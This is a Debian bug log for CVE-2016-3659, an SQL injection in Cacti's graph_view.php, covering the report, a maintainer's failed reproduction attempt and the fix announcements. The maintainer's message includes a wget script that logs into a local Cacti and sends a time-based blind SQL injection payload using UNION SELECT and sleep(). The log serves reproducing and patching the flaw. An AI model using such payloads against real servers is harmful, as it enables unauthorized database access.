cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php

Debian Bug report logs - #820521
cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>

To: Debian Bug Tracking System <submit@bugs.debian.org>

Subject: cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php

Date: Sat, 09 Apr 2016 13:56:52 +0200

Source: cacti
Version: 0.8.8g+ds1-1
Severity: important
Tags: security upstream
Forwarded: http://bugs.cacti.net/view.php?id=2673

Hi,

the following vulnerability was published for cacti. AFAICT, there
is not yet an upstream patch for this issue.

CVE-2016-3659[0]:
Cacti graph_view.php SQL Injection Vulnerability

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2016-3659
[1] http://bugs.cacti.net/view.php?id=2673
[2] http://seclists.org/fulldisclosure/2016/Apr/4

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore

Message #10 received at 820521@bugs.debian.org (full text, mbox, reply):

From: Paul Gevers <elbrus@debian.org>

To: 820521@bugs.debian.org

Subject: Re: cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php

Date: Fri, 29 Apr 2016 06:33:48 +0200

[Message part 1 (text/plain, inline)]

Control: tags -1 help

For the record of this bug.

I have not been able to reproduce this on my Debian system, and upstream
hasn't responded yet to the bug report. Any help in reproducing and
providing a script to reproducing is welcome. The script from the
upstream bug report does not reproduce the issue for me.

One data point, I have verified that the code we try to inject is valid
MySQL code in the Debian (sid) version and as such should delay if one
is able to trigger the vulnerability.

Paul

-------- Forwarded Message --------
Subject: reproducing vulnerability
Date: Sun, 10 Apr 2016 13:47:54 +0200
From: Paul Gevers <elbrus@debian.org>
To: Debian Security <security@debian.org>

Hi,

Call me dumb or ignorant, but even with multiple tries over the last
couple of days, I have not been able to reproduce a CVE¹ against my
package cacti. I have tried using wget with the code below and also in
my browser (iceweasel with "Web Developer" plugin) by changing "hidden"
fields to trigger the issue without success. Am I doing this wrong? Do
you have tips or tricks how to test these kind of security issues?

(Obviously, I am not doubting the CVE itself, although it may be so that
Debian is not vulnerable. I would be surprised though.)

#### Initializing stuff
database_pw=theAdminPasswordHere
tmpFile1=$(mktemp)
tmpFile2=$(mktemp)
cookieFile=$(mktemp)
loadSaveCookie="--load-cookies $cookieFile --keep-session-cookies
--save-cookies $cookieFile"

# Make sure we get the magic, this is stored in the cookies for future use.
wget --keep-session-cookies --save-cookies "$cookieFile"
--output-document="$tmpFile1" http://localhost/cacti/index.php
magic=$(grep "name='__csrf_magic' value=" "$tmpFile1" | sed
"s/.*__csrf_magic' value=\"//" | sed "s/\" \/>//")
postData="action=login&login_username=admin&login_password=${database_pw}&__csrf_magic=${magic}"
wget $loadSaveCookie --post-data="$postData"
--output-document="$tmpFile2" http://localhost/cacti/index.php

#### and then the real tries here:
# CVE-2016-3659 Unfortunately, I am not able to trigger the issue
wget $loadSaveCookie --timeout=10 --tries=1
"http://localhost/cacti/graph_view.php?action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1
union select case when ord(substring((select version()) from 1 for 1))
between 53 and 53 then sleep(100) else 0 end"

wget $loadSaveCookie --timeout=10 --tries=1
--post-data="__csrf_magic=${magic}&action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1%20union%20select%20case%20when%20ord(substring((select%20version())%20from%201%20for%201))%20between%2053%20and%2053%20then%20sleep(100)%20else%200%20end"
"http://localhost/cacti/graph_view.php"

Paul

¹ https://security-tracker.debian.org/tracker/CVE-2016-3659

[signature.asc (application/pgp-signature, attachment)]

Message #19 received at 820521-close@bugs.debian.org (full text, mbox, reply):

From: Paul Gevers <elbrus@debian.org>

To: 820521-close@bugs.debian.org

Subject: Bug#820521: fixed in cacti 0.8.8h+ds1-1

Date: Mon, 16 May 2016 19:22:29 +0000

Source: cacti
Source-Version: 0.8.8h+ds1-1

We believe that the bug you reported is fixed in the latest version of
cacti, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 820521@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Paul Gevers <elbrus@debian.org> (supplier of updated cacti package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 14 May 2016 22:26:35 +0200
Source: cacti
Binary: cacti
Architecture: source
Version: 0.8.8h+ds1-1
Distribution: unstable
Urgency: medium
Maintainer: Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
Changed-By: Paul Gevers <elbrus@debian.org>
Description:
 cacti      - web interface for graphing of monitoring systems
Closes: 820521
Changes:
 cacti (0.8.8h+ds1-1) unstable; urgency=medium
 .
   * New upstream release
     - CVE-2016-3659 SQL Injection Vulnerability in graph_view.php (Closes:
       #820521)
   * Drop obsolete patches (applied upstream)
   * Update tests to depend on javascript-common
   * Don't test lighttpd for now
   * Drop jquery.js from the source (wasn't used anyways in Debian), so no
     need to document it in d/copyright
   * Add make_cacti_sql_mode-strict_compatible.patch to enable cacti to
     work with the default settings of MySQL 5.7 (LP: #1578144)
Checksums-Sha1:
 0e74c81425313ef829c7cd869d775196bf8c6a06 1571 cacti_0.8.8h+ds1-1.dsc
 d999403cd29250f956e8db95952eb6dc5f8be9a8 2154671 cacti_0.8.8h+ds1.orig.tar.gz
 463e88bfa5e2cc607e72dea144b4490396ad4d2d 47544 cacti_0.8.8h+ds1-1.debian.tar.xz
Checksums-Sha256:
 efb553707b2a8e8b69f4f39662557ff634c8701995d58cee79da75821871fefa 1571 cacti_0.8.8h+ds1-1.dsc
 75f9e455b6bbd16c14ef1fb92426900f86e067512eb0d64b87b7eb97bbe78efc 2154671 cacti_0.8.8h+ds1.orig.tar.gz
 0eb9f3ecfb2106254e067ac7f84d2d19491dae60749919fa75427e66c07d52cc 47544 cacti_0.8.8h+ds1-1.debian.tar.xz
Files:
 31b2e92accc2fc446af5bca2a168dbdc 1571 web extra cacti_0.8.8h+ds1-1.dsc
 8ff7049c7a1b4984d0bb35f079c9c671 2154671 web extra cacti_0.8.8h+ds1.orig.tar.gz
 28e5afd22d959e71a7f2290f24868c91 47544 web extra cacti_0.8.8h+ds1-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCAAGBQJXOgqiAAoJEJxcmesFvXUKwOIH/2mfInVQ1XDL/RvtNzIl6e69
kI0K5hfav++p8FQco3eZ82gbFNSjMltObwt6ESb7Ra6JWuqT6/DG0Nus644ohpDs
fee3a/SmikNN7LH3ttAyJjezCdCFVNbEEsa2z5bYzKKoKYy+RtC+Dd5nS0mhKQlt
Is+oXvrkiXEVrcqkHck65yM1FO75sXEwAuuN4kJnhgF618WfmPaAuPCGp5SftbW2
KcZd+7uWFj+t0/hnjM4Xdmm4nUyuNwofwCSJc8+KTTPfSRrE8Tbn7B8b8aXU/cc3
nmZ0tpmS+GxYsqsGV59bNjeHapbTjQPcBRHr72Vc5uMObloeApQErpXno9O/vdk=
=pacD
-----END PGP SIGNATURE-----

Message #24 received at 820521-close@bugs.debian.org (full text, mbox, reply):

From: Paul Gevers <elbrus@debian.org>

To: 820521-close@bugs.debian.org

Subject: Bug#820521: fixed in cacti 0.8.8b+dfsg-8+deb8u5

Date: Sat, 16 Jul 2016 22:02:41 +0000

Source: cacti
Source-Version: 0.8.8b+dfsg-8+deb8u5

We believe that the bug you reported is fixed in the latest version of
cacti, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 820521@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Paul Gevers <elbrus@debian.org> (supplier of updated cacti package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 09 Jul 2016 20:05:41 +0200
Source: cacti
Binary: cacti
Architecture: source all
Version: 0.8.8b+dfsg-8+deb8u5
Distribution: jessie-proposed-updates
Urgency: medium
Maintainer: Cacti Maintainer <pkg-cacti-maint@lists.alioth.debian.org>
Changed-By: Paul Gevers <elbrus@debian.org>
Description:
 cacti      - web interface for graphing of monitoring systems
Closes: 814353 818647 820521
Changes:
 cacti (0.8.8b+dfsg-8+deb8u5) jessie-proposed-updates; urgency=medium
 .
   [ Emilio Pozuelo Monfort ]
   * debian/patches/CVE-2016-3172-sql-injection.patch:
     + CVE-2016-3172: Fix sql injection in tree.php (Closes: #818647)
   * debian/patches/CVE-2016-3659-sql-injection.patch:
     + CVE-2016-3659: Fix sql injection in graph_view.php (Closes: #820521)
   * debian/patches/CVE-2016-2313-authentication-bypass.patch:
     + CVE-2016-2313: Fix authentication bypass (Closes: #814353)
Checksums-Sha1:
 985cce7d8476be171f43f007e38b2d99fbf35336 1666 cacti_0.8.8b+dfsg-8+deb8u5.dsc
 7f8f9d7376431890775fb028d05cbe501897b700 116024 cacti_0.8.8b+dfsg-8+deb8u5.debian.tar.xz
 1fc6c14eb4b6700f243a3ce668d04c13d69816e6 1894154 cacti_0.8.8b+dfsg-8+deb8u5_all.deb
Checksums-Sha256:
 be49709c9c464f9042a4d32cb2a4307852d67ab93147f8c8c08ef9ac3bce6d35 1666 cacti_0.8.8b+dfsg-8+deb8u5.dsc
 888a0f8526de8f85f9b515017399fa12971362a58e5d5e0fd51725b69c3d1954 116024 cacti_0.8.8b+dfsg-8+deb8u5.debian.tar.xz
 04903ef10a9b6c5ad3bbf5424ee6a9d522705f93315da521a4263cea3d8e6fb3 1894154 cacti_0.8.8b+dfsg-8+deb8u5_all.deb
Files:
 1afd440ede4ccd9405b25bcdcbd521c3 1666 web extra cacti_0.8.8b+dfsg-8+deb8u5.dsc
 b32c421a920578ec4ca6f27e99950b9b 116024 web extra cacti_0.8.8b+dfsg-8+deb8u5.debian.tar.xz
 8a35d0e97846b58b0398f8abf5ce8794 1894154 web extra cacti_0.8.8b+dfsg-8+deb8u5_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCAAGBQJXiNOqAAoJEJxcmesFvXUKudIH/19i/+6yquq2E5FIKqQ+v3TM
EkvGkO50rbdYQYoKN5cEEQjV8u2U2/j5I7X5VGBYo4OOC04jQxpS+I5OBvqFmjTU
VY8DEnZ0o1bBXWq1clDIhaEzmIGUs3z5g9XaREwOaNgxI5H5saXXaBdfohQ2e5jU
tgymwLi0irLODMx8qvwuOLRuyja3h44Y+foKulSw5xrN+2s0XrLakggTM9KLqme8
ivwGENER9sSDLIe+Hx/Or+0MqmpFNYipXb6FxdT/znoCfVALApAvvTYcvxE2w6oe
GISnjShk59WH4UFh+THi8dGay1Oujdl1+sSd6nqLBxPqvNYTFAk8QJb7cMOlMLI=
=R6gn
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.